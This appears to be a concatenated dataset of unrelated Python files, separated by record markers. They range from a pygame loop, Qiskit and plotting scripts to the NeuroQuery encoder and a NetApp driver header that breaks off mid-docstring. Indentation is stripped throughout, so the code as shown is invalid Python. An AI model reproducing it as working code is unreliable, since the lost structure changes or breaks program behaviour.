bullet_group.draw(screen)
alien_group.draw(screen)
alien_bullet_group.draw(screen)
explosion_group.draw(screen)
# event handlers
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
pygame.display.update()
pygame.quit()
| nilq/baby-python | python |
if __name__ == '__main__':
n = int(input())
numbers = [None]*(n+1)
a = list(map(int,input().split()))
for i in a:
numbers[i] = True
for i in range(1,n+1):
if numbers[i] is None:
print(i) | nilq/baby-python | python |
import zmq
import uuid
from random import randint
from common.settings import *
context = zmq.Context()
servers = SERVERS_LOCAL
connections = []
for i in xrange(N_SERVERS):
socket = context.socket(zmq.REQ)
socket.connect("tcp://" + servers[i]["client2server"])
connections.append(socket)
for i in range(600):
rand_server = randint(0, len(connections) - 1)
socket = connections[rand_server]
socket.send_json({
"type" : "spawn",
"player_id" : uuid.uuid4().hex,
"player_type" : "h"
})
response = socket.recv()
for socket in connections:
socket.close() | nilq/baby-python | python |
#!/usr/bin/env python
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
plt.rcParams.update({'font.size': 16})
dt = 0.02
dims = 201, 201
x = range(-100, 101)
for i in range(0,1100, 100):
input_file = 'tsunami_h_' + '%4.4i' % i + '.dat'
print('Plotting ' + input_file)
field = np.reshape(np.fromfile(input_file, dtype='float32'), dims)
ticks = np.arange(-0.1, 0.11, 0.01)
field[field > 0.0999] = 0.0999
field[field <-0.0999] =-0.0999
fig = plt.figure(figsize=(8, 7))
ax = fig.add_subplot(111, aspect='equal')
cnt = plt.contourf(x, x, field, ticks, cmap=cm.Spectral)
for c in cnt.collections:
c.set_edgecolor('face')
plt.colorbar(shrink=0.8)
plt.xlabel('Distance [m]')
plt.ylabel('Distance [m]')
plt.title('Water height @ time = ' + '%3.1f' % (i * dt) + ' s')
plt.savefig(input_file[:-2] + '.png')
#plt.savefig(input_file[:-2] + '.svg')
plt.close(fig)
| nilq/baby-python | python |
import filecmp
import os.path
class dircmp(filecmp.dircmp):
"""
Compare the content of dir1 and dir2. In contrast with filecmp.dircmp, this
subclass compares the content of files with the same path.
"""
def phase3(self):
"""
Find out differences between common files.
Ensure we are using content comparison with shallow=False.
"""
fcomp = filecmp.cmpfiles(self.left, self.right, self.common_files,
shallow=False)
self.same_files, self.diff_files, self.funny_files = fcomp
def is_same(dir1, dir2):
"""
Compare two directory trees content.
Return False if they differ, True is they are the same.
"""
compared = dircmp(dir1, dir2)
if (compared.left_only or compared.right_only or compared.diff_files
or compared.funny_files):
return False
for subdir in compared.common_dirs:
if not is_same(os.path.join(dir1, subdir), os.path.join(dir2, subdir)):
return False
return True | nilq/baby-python | python |
wrf_dir="/home/WRFV4.1.3/run_tutorial/"
wrf_input_file="wrfinput_d01"
wrf_bdy_file="wrfbdy_d01"
wrf_met_dir="/home/WPSV4.1.3/run_tutorial/"
wrf_met_files="met_em.d01.2010*"
mera_dir="/home/Merra2_data/"
mera_files="svc_MERRA2_300.inst3_3d_aer_Nv.2010*"
do_IC=True
do_BC=True
###########################################
#GOCART DUST ONLY
spc_map = [ 'DUST_1 -> 1.0*[DU001];1.e9',
'DUST_2 -> 1.0*[DU002];1.e9',
'DUST_3 -> 1.0*[DU003];1.e9',
'DUST_4 -> 1.0*[DU004];1.e9',
'DUST_5 -> 1.0*[DU005];1.e9']
#GOCART FULL
spc_map = [ 'DUST_1 -> 1.0*[DU001];1.e9',
'DUST_2 -> 1.0*[DU002];1.e9',
'DUST_3 -> 1.0*[DU003];1.e9',
'DUST_4 -> 1.0*[DU004];1.e9',
'DUST_5 -> 1.0*[DU005];1.e9',
'SEAS_1 -> 1.0*[SS002];1.e9',
'SEAS_2 -> 1.0*[SS003];1.e9',
'SEAS_3 -> 1.0*[SS004];1.e9',
'SEAS_4 -> 1.0*[SS005];1.e9',
'so2 -> 0.453*[SO2];1.e6',
'sulf -> 0.302*[SO4];1.e6',
'BC1 -> 1.0*[BCPHOBIC];1.e9',
'BC2 -> 1.0*[BCPHILIC];1.e9',
'OC1 -> 1.0*[OCPHOBIC];1.e9',
'OC2 -> 1.0*[OCPHILIC];1.e9',
'dms -> 0.467*[DMS];1.e6']
#,'msa -> 0.302*[MSA];1.e6'
spc_map = [ 'o3 -> 0.604*[O3];1.e6','co -> 1.0*[CO];1.e6']
#spc_map = [ 'so2 -> 0.453*[SO2];1.e6','sulf -> 0.302*[SO4];1.e6']
###########################################
#CBMZ-MOSAIC_8bins SO2, Sulf, O3, CO, DUST and Sea salt (NaCl).
#oc_a0X,bc_a0X still need to be done
spc_map =['so2 -> 0.453*[SO2];1.e6',
'o3 -> 0.604*[O3];1.e6',
'co -> 1.0*[CO];1.e6',
'oin_a01->0.01292*[DU001];1.e9',
'oin_a02->0.03876*[DU001];1.e9',
'oin_a03->0.19382*[DU001];1.e9',
'oin_a04->0.30103*[DU001];1.e9',
'oin_a05->0.30103*[DU001];1.e9',
'oin_a06->0.20412*[DU001]+0.37963*[DU002];1.e9',
'oin_a07->0.62037*[DU002]+0.64308*[DU003];1.e9',
'oin_a08->0.35692*[DU003]+0.73697*[DU004];1.e9',
'na_a01->0.086245*[SS001];1.e9',
'na_a02->0.226471*[SS001];1.e9',
'na_a03->0.080656*[SS001]+0.109080*[SS002];1.e9',
'na_a04->0.169416*[SS002];1.e9',
'na_a05->0.114876*[SS002]+0.079899*[SS003];1.e9',
'na_a06->0.248190*[SS003];1.e9',
'na_a07->0.065283*[SS003]+0.166901*[SS004];1.e9',
'na_a08->0.226471*[SS004]+0.000000*[SS005];1.e9',
'cl_a01->0.133000*[SS001];1.e9',
'cl_a02->0.349246*[SS001];1.e9',
'cl_a03->0.124382*[SS001]+0.168214*[SS002];1.e9',
'cl_a04->0.261260*[SS002];1.e9',
'cl_a05->0.177153*[SS002]+0.123215*[SS003];1.e9',
'cl_a06->0.382739*[SS003];1.e9',
'cl_a07->0.100674*[SS003]+0.257382*[SS004];1.e9',
'cl_a08->0.349246*[SS004]+0.000000*[SS005];1.e9',
'so4_a01->0.057541*[SO4];1.e9',
'so4_a02->0.116135*[SO4];1.e9',
'so4_a03->0.264759*[SO4];1.e9',
'so4_a04->0.246169*[SO4];1.e9',
'so4_a05->0.091116*[SO4];1.e9',
'so4_a06->0.013328*[SO4];1.e9',
'so4_a07->0.000762*[SO4];1.e9',
'so4_a08->0.000017*[SO4];1.e9',
'num_a01->5.855e+16*[DU001]+1.147e+18*[SS001]+3.621e+17*[SO4];1',
'num_a02->2.196e+16*[DU001]+3.766e+17*[SS001]+9.136e+16*[SO4];1',
'num_a03->1.372e+16*[DU001]+1.676e+16*[SS001]+2.267e+16*[SS002]+2.604e+16*[SO4];1',
'num_a04->2.664e+15*[DU001]+4.401e+15*[SS002]+3.026e+15*[SO4];1',
'num_a05->3.330e+14*[DU001]+3.731e+14*[SS002]+2.595e+14*[SS003]+1.400e+14*[SO4];1',
'num_a06->2.663e+13*[DU001]+4.953e+13*[DU002]+1.008e+14*[SS003]+2.560e+12*[SO4];1',
'num_a07->1.012e+13*[DU002]+1.049e+13*[DU003]+3.313e+12*[SS003]+8.469e+12*[SS004]+1.829e+10*[SO4];1',
'num_a08->7.276e+11*[DU003]+1.502e+12*[DU004]+1.436e+12*[SS004]+1.599e-03*[SS005]+5.048e+07*[SO4];1']
| nilq/baby-python | python |
import pathlib
import numpy as np
from scipy import sparse
import pandas as pd
from sklearn.preprocessing import normalize
from sklearn.utils.extmath import safe_sparse_dot
from nilearn import image
from neuroquery.img_utils import get_masker
from neuroquery import tokenization, smoothed_regression, ridge
_MAX_SIMILAR_DOCS_RETURNED = 100
class NeuroQueryModel:
"""Text -> brain map encoder.
It encodes text into statistical maps of the brain and also provides a list
of related terms.
It can be initialized with a fitted regression model
(`neuroquery.smoothed_regression.SmoothedRegression`) or loaded using
`from_data_dir`. Most users will probably load a pre-trained model with
`from_data_dir`.
Parameters
----------
vectorizer : `neuroquery.tokenization.TextVectorizer`
An object that transforms text into TFIDF features.
smoothed_regression : `neuroquery.smoothed_regression.SmoothedRegression`
A reduced-rank regression that combines feature smoothing, projection,
and linear regression. The input features must correspond to the
outputs of `vectorizer`.
mask_img : Nifti1Image
Mask of the regression targets. The non-zero voxels correspond to the
dependent variables.
corpus_info : dict, optional (default=None)
Data required to report which studies are most relevant for a query.
Must contain:
- "metadata": pandas DataFrame, each row describing a study
- "tfidf": scipy sparse matrix or numpy array, TFIDF features for
the documents. Rows must correspond to the same studies as in
"metadata", and columns to the terms in the vectorizer's
vocabulary.
If corpus_info is not available the model will not report most similar
studies.
"""
@classmethod
def from_data_dir(cls, model_dir):
"""Load a pre-trained TextToBrain model.
Parameters
----------
model_dir : str
path to a directory containing the serialized trained model.
The directory must be organized as the one returned by
`neuroquery.datasets.fetch_neuroquery_model`, except that
`corpus_metadata.csv` and `corpus_tfidf.npz` are optional.
"""
model_dir = pathlib.Path(model_dir)
vectorizer = tokenization.TextVectorizer.from_vocabulary_file(
str(model_dir / "vocabulary.csv"),
voc_mapping="auto",
add_unigrams=False,
)
regression = smoothed_regression.SmoothedRegression.from_data_dir(
str(model_dir)
)
mask_img = image.load_img(str(model_dir / "mask_img.nii.gz"))
corpus_tfidf = model_dir / "corpus_tfidf.npz"
corpus_metadata = model_dir / "corpus_metadata.csv"
if corpus_tfidf.is_file() and corpus_metadata.is_file():
corpus_info = {}
corpus_info["tfidf"] = sparse.load_npz(str(corpus_tfidf))
corpus_info["metadata"] = pd.read_csv(
str(corpus_metadata), encoding="utf-8"
)
else:
corpus_info = None
return cls(vectorizer, regression, mask_img, corpus_info=corpus_info)
def to_data_dir(self, model_dir):
"""Save the model so it can later be loaded with `from_data_dir`."""
model_dir = pathlib.Path(model_dir)
model_dir.mkdir(parents=True, exist_ok=True)
self.vectorizer.to_vocabulary_file(str(model_dir / "vocabulary.csv"))
self.smoothed_regression.to_data_dir(model_dir)
self.get_masker().mask_img_.to_filename(
str(model_dir / "mask_img.nii.gz")
)
if self.corpus_info is not None:
sparse.save_npz(
str(model_dir / "corpus_tfidf.npz"),
sparse.csr_matrix(self.corpus_info["tfidf"]),
)
self.corpus_info["metadata"].to_csv(
str(model_dir / "corpus_metadata.csv"), index=False
)
def __init__(
self, vectorizer, smoothed_regression, mask_img, corpus_info=None
):
self.vectorizer = vectorizer
self.smoothed_regression = smoothed_regression
self.mask_img = mask_img
self.corpus_info = corpus_info
def full_vocabulary(self):
"""All the terms recognized by the model."""
return self.vectorizer.get_vocabulary()
def _supervised_features(self):
if not hasattr(
self.smoothed_regression.regression_, "selected_features_"
):
return np.arange(
self.smoothed_regression.regression_.coef_.shape[1]
)
return self.smoothed_regression.regression_.selected_features_
def supervised_vocabulary(self):
"""Terms selected as features for the supervised regression."""
return np.asarray(self.full_vocabulary())[self._supervised_features()]
def document_frequencies(self):
if self.corpus_info is None:
return None
if not hasattr(self, "document_frequencies_"):
document_frequencies = (self.corpus_info["tfidf"] > 0).sum(axis=0)
document_frequencies = np.asarray(document_frequencies).ravel()
self.document_frequencies_ = pd.Series(
document_frequencies, index=self.full_vocabulary()
)
return self.document_frequencies_
def _similar_words(self, tfidf, vocabulary=None):
if vocabulary is None:
vocabulary = self.full_vocabulary()
if sparse.issparse(tfidf):
tfidf = tfidf.A.squeeze()
similar = pd.Series(tfidf, index=vocabulary).sort_values(
ascending=False
)
return similar[similar > 0]
def similar_documents(self, tfidf):
if self.corpus_info is None:
return None
similarities = safe_sparse_dot(
tfidf, self.corpus_info["tfidf"].T, dense_output=True
).ravel()
order = np.argsort(similarities)[::-1]
order = order[similarities[order] > 0][:_MAX_SIMILAR_DOCS_RETURNED]
ordered_simil = similarities[order]
similar_docs = (
self.corpus_info["metadata"].iloc[order].reset_index(drop=True)
)
similar_docs["similarity"] = ordered_simil
return similar_docs
def _beta_norms(self):
return np.linalg.norm(
self.smoothed_regression.regression_.coef_, axis=0
)
def get_masker(self):
if not hasattr(self, "masker_"):
self.masker_ = get_masker(self.mask_img)
return self.masker_
def _supervised_vocabulary_set(self):
if not hasattr(self, "supervised_vocabulary_set_"):
self.supervised_vocabulary_set_ = set(self.supervised_vocabulary())
return self.supervised_vocabulary_set_
def transform(self, documents):
"""Transform a set of documents
Parameters
----------
documents : list or array of str
the text snippets to transform
Returns
-------
list of dict, each containing:
- "brain_map": a nifti image of the most relevant brain regions.
- "raw_tfidf": the vectorized documents.
- "smoothed_tfidf": the tfidf after semantic smoothing.
- "z_map" is an alias for "brain_map" for backwards compatibility
"""
raw_tfidf = self.vectorizer.transform(documents)
raw_tfidf = normalize(raw_tfidf, copy=False)
self.smoothed_regression.regression_.intercept_ = 0.0
brain_maps = self.smoothed_regression.transform_to_brain_maps(
raw_tfidf
)
masker = self.get_masker()
brain_maps_unmasked = list(map(masker.inverse_transform, brain_maps))
smoothed_tfidf = self.smoothed_regression.smoothing_.transform(
raw_tfidf
)
smoothed_tfidf = normalize(smoothed_tfidf, copy=False)
return {
"brain_map": brain_maps_unmasked,
"z_map": brain_maps_unmasked,
"raw_tfidf": raw_tfidf,
"smoothed_tfidf": smoothed_tfidf,
}
def __call__(self, document):
"""Transform a document
Parameters
----------
document : str
the text to transform
Returns
-------
dict containing:
- "brain_map": a nifti image of the most relevant brain regions.
- "similar_words": pandas DataFrame containing related terms.
- "similarity" is how much the term is related.
- "weight_in_brain_map" is the contribution of the term in the
predicted "brain_map".
- "weight_in_query" is the TFIDF of the term in `document`.
- "similar_documents": if no corpus_info was provided, this is
`None`. Otherwise it is a DataFrame containing information about
the most relevant studies.
- "highlighted_text": an XML document showing which terms were
recognized in the provided text.
- "smoothed_tfidf": the tfidf after semantic smoothing.
- "raw_tfidf": the vectorized documents.
- "z_map" is an alias for "brain_map" for backwards compatibility
"""
self.vectorizer.tokenizer.keep_pos = True
result = self.transform([document])
result = {k: v[0] for k, v in result.items()}
similar_words = pd.DataFrame(
{
"similarity": self._similar_words(result["smoothed_tfidf"]),
"weight_in_query": self._similar_words(result["raw_tfidf"]),
"weight_in_brain_map": self._similar_words(
result["smoothed_tfidf"][self._supervised_features()]
* self._beta_norms(),
self.supervised_vocabulary(),
),
},
columns=["similarity", "weight_in_brain_map", "weight_in_query"],
)
similar_words.fillna(0.0, inplace=True)
similar_words.sort_values(
by="weight_in_brain_map", ascending=False, inplace=True
)
doc_freq = self.document_frequencies()
if doc_freq is not None:
similar_words["n_documents"] = doc_freq.loc[similar_words.index]
similar_words = similar_words.loc[
:,
[
"similarity",
"weight_in_brain_map",
"weight_in_query",
"n_documents",
],
]
result["similar_words"] = similar_words
result["similar_documents"] = self.similar_documents(
result["smoothed_tfidf"]
)
self._supervised_vocabulary_set()
result[
"highlighted_text"
] = self.vectorizer.tokenizer.highlighted_text(
lambda w: {
"in_model": (
"true" if w in self.supervised_vocabulary_set_ else "false"
)
}
)
return result
class SimpleEncoder:
"""Basic text to brain map encoder"""
@classmethod
def from_data_dir(cls, model_dir):
model_dir = pathlib.Path(model_dir)
vectorizer = tokenization.TextVectorizer.from_vocabulary_file(
str(model_dir / "vocabulary.csv"),
voc_mapping="auto",
add_unigrams=False,
)
regression = ridge.FittedLinearModel.from_data_dir(model_dir)
mask_img = image.load_img(str(model_dir / "mask_img.nii.gz"))
return cls(vectorizer, regression, mask_img)
def to_data_dir(self, model_dir):
"""Save the model so it can later be loaded with `from_data_dir`."""
model_dir = pathlib.Path(model_dir)
model_dir.mkdir(parents=True, exist_ok=True)
self.vectorizer.to_vocabulary_file(str(model_dir / "vocabulary.csv"))
self.regression.to_data_dir(model_dir)
self.get_masker().mask_img_.to_filename(
str(model_dir / "mask_img.nii.gz")
)
def __init__(self, vectorizer, regression, mask_img):
self.vectorizer = vectorizer
self.regression = regression
self.mask_img = mask_img
def get_masker(self):
if not hasattr(self, "masker_"):
self.masker_ = get_masker(self.mask_img)
return self.masker_
def __call__(self, document):
self.vectorizer.tokenizer.keep_pos = True
self.regression.intercept_ = 0.0
result = {}
tfidf = self.vectorizer.transform([document])
masked_map = self.regression.predict(tfidf).squeeze()
result["brain_map"] = self.get_masker().inverse_transform(masked_map)
result[
"highlighted_text"
] = self.vectorizer.tokenizer.highlighted_text()
return result
def full_vocabulary(self):
"""All the terms recognized by the model."""
return self.vectorizer.get_vocabulary()
| nilq/baby-python | python |
def dutch(arr):
low = 0
mid = 0
high = len(arr) - 1
while mid <= high:
if arr[mid] == 0:
arr[low], arr[mid] = arr[mid], arr[low]
low += 1
mid += 1
elif arr[mid] == 1:
mid += 1
else:
arr[mid], arr[high] = arr[high], arr[mid]
high -= 1
arr = [1,0,2,1,0,2,1,2,1,2,1,1,0,2,1,0,1,2,1,2,1,1,2,1,0,2,1,1]
print(arr)
dutch(arr)
print(arr)
| nilq/baby-python | python |
# find an specific element of a list
import numpy as np
import matplotlib.pyplot as plt
from qiskit import QuantumCircuit, transpile
from qiskit.providers.aer import QasmSimulator
from qiskit.visualization import plot_histogram
# Use Aer's qasm_simulator
simulator = QasmSimulator()
# Create a oracle operator
oracle = QuantumCircuit(2, name='oracle')
oracle.cz(0,1) #flips sign of winning state, (specific to |11> being the winning state)
oracle.to_gate() #makes oracle its own gate
# create reflection operator
reflection = QuantumCircuit(2, name='reflection')
# take our superposition state back to \ell-0 state
reflection.h([0,1])
# apply negative phase only to 00 state
reflection.z([0,1])
reflection.cz(0,1)
# transform back to superpos state
reflection.h([0,1])
reflection.to_gate() #turns refelction into a gate
# create circuit that flips winning answer: |11>
grover_circ = QuantumCircuit(2,2)
# apply H gate to all qubits
grover_circ.h([0,1]) #prepares superposition state
grover_circ.append(oracle,[0,1]) # add on oracle
grover_circ.append(reflection,[0,1]) # add on reflection
grover_circ.measure([0,1],[0,1]) # measure
# compile the circuit down to low-level QASM instructions
# supported by the backend (not needed for simple circuits)
compiled_circuit = transpile(grover_circ, simulator)
# Execute the circuit on the qasm simulator
job = simulator.run(compiled_circuit, shots=1)
# Grab results from the job
result = job.result()
# Returns counts
counts = result.get_counts(grover_circ)
print(counts)
# Draw the circuit (with matplotlib)
grover_circ.draw(output='mpl')
plt.show()
# Plot a histogram
#plot_histogram(counts)
#plt.show() | nilq/baby-python | python |
import re
regex = r"\*\*(?P<bold>\S+)\*\*|\*(?P<italic>\S+)\*|==(?P<wrap>\S+)==|\[(?P<url>\S+\]\(\S+)\)"
p = re.compile(regex, re.MULTILINE)
func_dict = {
'wrap': lambda x: (f"<mark>{x}</mark>", f"=={x}=="),
'bold': lambda x: (f"<b>{x}</b>", f"**{x}**"),
'italic': lambda x: (f"<i>{x}</i>", f"*{x}*"),
'url': lambda x: ("<a href='{1}' target='_blank'>{0}</a>".format(*x.split('](')), f"[{x})"),
}
def format_string(test_str: str) -> str:
matches = list(p.finditer(test_str))
for match in matches:
for key, item in match.groupdict().items():
if item:
x, y = func_dict[key](item)
return format_string(test_str.replace(y, x))
return test_str
def form_str(string: str) -> str:
"""
Форматирование строки по markdown
- Строка с тегами разделенными пробелами
- Теги можно комбинировать
- italic
- bold
- marker wrap
- a tag
"""
return format_string(string.replace(' ', '|')).replace('|', ' ')
| nilq/baby-python | python |
import numpy as np
import math
import rospy
from tf.transformations import quaternion_from_euler, euler_from_quaternion
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import Point, PoseArray
from visualization_msgs.msg import Marker
from visualization_msgs.msg import MarkerArray
from ackermann_msgs.msg import AckermannDriveStamped
from angles import *
num_waypoints = 5
waypoint_tol = 0.1
retrace_waypoint_tol = 0.15
wheelbase = 1.9
ODOM_INF = "/ground_truth/state" | nilq/baby-python | python |
from sqlalchemy.orm.collections import attribute_mapped_collection
from emonitor.extensions import db
from emonitor.modules.alarmkeys.alarmkeycar import AlarmkeyCars
from emonitor.modules.alarmkeys.alarmkeyset import AlarmkeySet
class Alarmkey(db.Model):
"""Alarmkey class"""
__tablename__ = 'alarmkeys'
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True)
category = db.Column(db.String(40), default='')
key = db.Column(db.String(40), default='')
key_internal = db.Column(db.String(40), default='')
_keyset = db.Column('keyset', db.ForeignKey('alarmkeysets.id'))
keyset = db.relationship("AlarmkeySet", collection_class=attribute_mapped_collection('id'))
keysetitem = db.Column(db.INTEGER, default=0)
remark = db.Column(db.Text)
def __init__(self, category, key, key_internal, remark, keyset=None, keysetitem=None):
self.category = category
self.key = key
self.key_internal = key_internal
self.remark = remark
self._keyset = keyset
self.keysetitem = keysetitem
def _getCars(self, cartype, department):
"""
Prototype method for car or material lists
:param cartype: 1|2|3: cars1, cars2, material as integer
:param department: id of department as integer
:return: list of cars, material
"""
alarmcars = AlarmkeyCars.getAlarmkeyCars(kid=self.id or 9999, dept=department)
if not alarmcars:
# try default
alarmcars = AlarmkeyCars.getAlarmkeyCars(kid=9999, dept=department)
if alarmcars:
if cartype == 1:
return alarmcars.cars1
elif cartype == 2:
return alarmcars.cars2
elif cartype == 3:
return alarmcars.materials
else:
return []
def setCars(self, department, **kwargs):
"""
Set carlist of department
:param department: id of department as integer
:param kwargs:
- *cars1*: list of :py:class:`emonitor.modules.cars.car.Car` objects for cars1
- *cars2*: list of :py:class:`emonitor.modules.cars.car.Car` objects for cars2
- *material*: list of :py:class:`emonitor.modules.cars.car.Car` objects for material
"""
alarmcars = AlarmkeyCars.getAlarmkeyCars(kid=self.id, dept=department)
if not alarmcars:
alarmcars = AlarmkeyCars(self.id, department, '', '', '')
db.session.add(alarmcars)
if "cars1" in kwargs.keys():
alarmcars._cars1 = kwargs['cars1']
if "cars2" in kwargs.keys():
alarmcars._cars2 = kwargs['cars2']
if "material" in kwargs.keys():
alarmcars._material = kwargs['material']
def getCars1(self, department):
"""
Get list of Car objects for cars1 of current alarmkey definition of given department
:param department: id of department as integer
:return: list of :py:class:`emonitor.modules.cars.car.Car` objects
"""
return self._getCars(1, department)
def getCars2(self, department):
"""
Get list of Car objects for cars2 of current alarmkey definition of given department
:param department: id of department as integer
:return: list of :py:class:`emonitor.modules.cars.car.Car` objects
"""
return self._getCars(2, department)
def getMaterial(self, department):
"""
Get list of Car objects for material of current alarmkey definition of given department
:param department: id of department as integer
:return: list of :py:class:`emonitor.modules.cars.car.Car` objects
"""
return self._getCars(3, department)
def hasDefinition(self, department):
"""
Get definition for current alarmkey of given department
:param department: id of department
:return: :py:class:`emonitor.modules.alarmkeys.alarmkey.Alarmkey` or *None*
"""
return AlarmkeyCars.getAlarmkeyCars(kid=self.id or 9999, dept=department) is None
@staticmethod
def getAlarmkeys(id='', keysetid=None):
"""
Get all alarmkey definitions or single definition with given 'id'
:param id: id of alarmkey
:param keysetid: id of :py:class:`emonitor.modules.alarmkeys.AlarmkeySet` oder *None*
:return: list of defintions or single definition
"""
if id not in ['', 'None']:
return Alarmkey.query.filter_by(id=id).first()
elif keysetid:
if int(keysetid) == 0: # deliver all un-matched items
return Alarmkey.query.filter_by(_keyset=None).order_by('category').all()
return Alarmkey.query.filter_by(_keyset=keysetid).order_by('category').all()
else:
keyset = AlarmkeySet.getCurrentKeySet()
if keyset is None:
return Alarmkey.query.order_by('category').all()
else:
return Alarmkey.query.filter_by(_keyset=keyset.id).order_by('category').all()
@staticmethod
def getOrphanKeys():
"""
Get list of all orphan alarmkeys
:return: list of orphan alarmkeys
"""
return Alarmkey.query.filter_by(keyset=None).all()
@staticmethod
def getAlarmkeysByName(name):
"""
Get Alarmkey object with given name
:param name: name as string (like)
:return: :py:class:`emonitor.modules.alarmkeys.alarmkey.Alarmkey` object
"""
return Alarmkey.query.filter(Alarmkey.key.like('%' + name + '%')).all()
@staticmethod
def getAlarmkeysByCategory(category):
"""
Get all alarmkey definitions of given category
:param category: category as string
:return: :py:class:`emonitor.modules.alarmkeys.alarmkey.Alarmkey` object list
"""
return Alarmkey.query.filter_by(category=category).all()
@staticmethod
def getAlarmkeysByCategoryId(categoryid, keysetid=None):
"""
Get all alarmkey definitions of given category id
:param categoryid: category as string
:param keysetid: keysetid as integer, 0 for un-matched, None for all
:return: :py:class:`emonitor.modules.alarmkeys.alarmkey.Alarmkey` object list
"""
key = Alarmkey.query.filter_by(id=categoryid).one()
if keysetid is None:
return Alarmkey.query.filter_by(category=key.category).all()
elif int(keysetid) == 0:
return Alarmkey.query.filter_by(category=key.category, _keyset=None).all()
else:
return Alarmkey.query.filter(Alarmkey.category == key.category and Alarmkey._keyset == keysetid).all()
@staticmethod
def getAlarmkeysDict():
"""
Get dict of all alarmkeys with alarmkey.id as dict key
:return: dict of alarmkeys
"""
return dict(db.get(Alarmkey.id, Alarmkey).order_by(Alarmkey.key).all())
@staticmethod
def getDefault(department):
"""
Get default alarmkey definition of given department
:param department: id as integer
:return: :py:class:`emonitor.modules.alarmkeys.alarmkey.Alarmkey` object
"""
return AlarmkeyCars.query.filter_by(kid=9999, dept=department).first() or AlarmkeyCars(9999, department, '', '', '')
| nilq/baby-python | python |
n1 = float(input('Nota 1: '))
n2 = float(input('Nota 2: '))
m = (n1 + n2) / 2
if m < 5:
print('REPROVADO :(')
elif m < 7:
print('RECUPERAÇÃO...')
else:
print('APROVADO!! :D')
| nilq/baby-python | python |
'''
prompt = "If you tell us who you are, we can personalize the messages you see"
prompt += "\nWhat is your first name: "
name = input(prompt)
print("\nHello, " + name + "!\n")
age = int(input("how old are you? "))
print(age, end="\n\n")
height = float(input("How tall are you, in meters? "))
if height >= 1.50:
print("\nYou're tall enough to ride!\n")
else:
print("\nYou're be able to ride when you're a little older.\n")
number = int(input("Enter a number, and I'll tell you if it's even or odd: "))
if number % 2 == 0:
print(f"\nThe number {number} is even.\n")
else:
print(f"\nthe number {number} is odd.\n")
'''
family = int(input('How many people are in your family group? '))
if family > 8:
print("\nYou must wait a moment.")
else:
print("\nYour table is set.") | nilq/baby-python | python |
'''
Get the residue depth for each residue in BioLiP
run as:
python -m ResidueDepth.Controller
'''
from Bio.PDB import PDBParser
from Bio.PDB import Selection
from Bio.PDB.ResidueDepth import get_surface, residue_depth, ca_depth
from Bio.PDB.Polypeptide import is_aa
import os
from AABindingSiteDist.Controller import BSParser
from PDBtools import GetFilewithPDB, CopyAndGunzip, GetStructure
from multiprocessing import Pool
import threading
DEBUG = False
PDBTOXYZ = "./ResidueDepth/msms/pdb_to_xyzr"
MSMS = "./ResidueDepth/msms/msms.x86_64Linux2.2.6.1"
OUTCA = "aveResCaDep.txt"
OUTALL = "aveResAllDep.txt"
OUT = "avedist2surface.txt"
BIOLIP_DIR = "./Data/bindingsite2.txt"
if DEBUG:
OUTCA = OUTCA + "_tmp"
OUTALL = OUTALL + "_tmp"
OUT = OUT + "_tmp"
# working directory
WDIR = "./ResidueDepth/tmp"
# thread safe for writing file
mutex_writefile = threading.Lock()
def GetResidueDepPDB(pdb, pdbfile):
s = GetStructure(pdb)
model = s[0]
residuelist = Selection.unfold_entities(model, 'R')
try:
surface = get_surface(pdbfile, PDBTOXYZ, MSMS)
except:
print "cannot get surface for " + pdbfile
return
content = ""
for residue in residuelist:
if not is_aa(residue):
continue
# minimun average depth for all atoms
resid = residue.get_id()
resname = residue.get_resname()
chainid = residue.get_parent().get_id()
try:
rd = residue_depth(residue, surface)
except:
continue
ca_rd = ca_depth(residue, surface)
info = [pdb, chainid, resid[1], resname, str(rd), str(ca_rd)]
for each in info:
if not each:
continue
#print info
newline = "\t".join(map(str, info)) + "\n"
content = content + newline
mutex_writefile.acquire()
outobj = open(OUT, "a")
outobj.write(content)
outobj.close()
mutex_writefile.release()
def RemoveExistingPDB(pdblist):
existpdbs = []
newpdblist = []
for line in open(OUT):
content = line.split()
pdb = content[0]
if not pdb in existpdbs:
existpdbs.append(pdb)
print len(existpdbs)
for eachpdb in pdblist:
if not eachpdb in existpdbs:
newpdblist.append(eachpdb)
print len(newpdblist)
return newpdblist
def RunOnePDB(pdb):
outdir = os.path.join(WDIR, pdb)
pdbfile = GetFilewithPDB(pdb)
CopyAndGunzip(pdbfile, outdir)
GetResidueDepPDB(pdb, outdir)
def RunAllBioLiPPDB():
bslist = BSParser(BIOLIP_DIR)
pdblist = []
#try:
# os.remove(OUT)
#except:
# pass
for bs in bslist:
pdb = bs.pdbid
if not pdb in pdblist:
pdblist.append(pdb)
print "Number of PDBs before remove existing PDBs:", len(pdblist)
pdblist = RemoveExistingPDB(pdblist)
print "Number of PDBs after remove existing PDBs:", len(pdblist)
print "one example:", pdblist[0]
#for pdb in pdblist:
# print pdb
pool = Pool(processes = 5)
result = pool.map_async( RunOnePDB, pdblist)
resulttxt = result.wait()
print resulttxt
if __name__ == "__main__":
pdbfile = "./tmp/pdb110m.ent"
#GetResidueDepPDB("110m", pdbfile)
#RemoveExistingPDB("")
RunAllBioLiPPDB()
| nilq/baby-python | python |
# Copyright (c) 2012 NetApp, Inc. All rights reserved.
# Copyright (c) 2014 Ben Swartzlander. All rights reserved.
# Copyright (c) 2014 Navneet Singh. All rights reserved.
# Copyright (c) 2014 Clinton Knight. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
# Copyright (c) 2015 Alex Meade. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Storage service catalog utility functions and classes for NetApp systems.
"""
import copy
import threading
from oslo_log import log as logging
from oslo_utils import timeutils
import six
from cinder import exception
from cinder.i18n import _, _LI, _LW
from cinder import utils
from cinder.volume.drivers.netapp.dataontap.client import api as netapp_api
from cinder.volume.drivers.netapp import utils as na_utils
LOG = logging.getLogger(__name__)
class NetAppVolume(object):
"""Represents a NetApp volume.
Present attributes
